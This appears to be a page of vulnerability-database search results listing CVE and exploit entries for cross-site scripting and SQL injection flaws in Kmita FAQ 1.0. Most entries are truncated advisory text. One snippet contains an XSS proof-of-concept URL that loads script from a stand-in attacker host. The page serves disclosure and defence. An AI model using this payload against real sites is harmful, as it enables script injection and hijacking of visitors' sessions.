17 matches found
EUVD-2006-2880
Malware in sbrugna...
EUVD-2006-2881
Malware in sbrugna...
Kmita FAQ 1.0 index.php catid Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly...
Kmita FAQ 1.0 search.php q Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly...
Cross-site scripting
Cross-site scripting (XSS) vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter...
CVE-2006-2884
SQL injection vulnerability in index.php in Kmita FAQ 1.0 allows remote attackers to execute arbitrary SQL commands via the catid parameter...
SQL injection
SQL injection vulnerability in index.php in Kmita FAQ 1.0 allows remote attackers to execute arbitrary SQL commands via the catid parameter...
CVE-2006-2883
Cross-site scripting (XSS) vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter...
CVE-2006-2883
CVE-2006-2883 concerns a cross-site scripting (XSS) vulnerability in Kmita FAQ 1.0’s search.php. The issue allows remote attackers to inject arbitrary web script or HTML via the q parameter. The vulnerability affects the search function and is documented with a CVSS 2.0 base score of 4.3 (Medium)...
CVE-2006-2883
Cross-site scripting (XSS) vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter...
CVE-2006-2884
SQL injection vulnerability in index.php in Kmita FAQ 1.0 allows remote attackers to execute arbitrary SQL commands via the catid parameter...
CVE-2006-2884
CVE-2006-2884 is a SQL injection vulnerability in Kmita FAQ 1.0, triggered via the catid parameter in index.php. The affected component is Kmita FAQ 1.0’s index.php handling of catid, enabling remote attackers to execute arbitrary SQL commands. The vulnerability is rated HIGH (CVSS v2 base 7.5) w...
Kmita FAQ v1.0
Kmita FAQ v1.0 Homepage: http://www.kmita-faq.com Affected files: search.php index.php Search.php does not sanitize user input before dynamically generating it. Proof of concept: http://www.example.com/search.php?q=SCRIPT20SRC=http://evilsite.com/xss.js/SCRIPT SQL Injection proof of concept:...
Kmita FAQ 1.0 - 'index.php?catid' SQL Injection
source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. A...
Kmita FAQ 1.0 - 'search.php?q' Cross-Site Scripting
source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. A...
Kmita FAQ 1.0 - index.php?catid SQL Injection
Kmita FAQ 1.0 - index.php?catid SQL Injection source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to...
Kmita FAQ 1.0 - search.php?q Cross-Site Scripting
Kmita FAQ 1.0 - search.php?q Cross-Site Scripting source: https://www.securityfocus.com/bid/18282/info Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application t...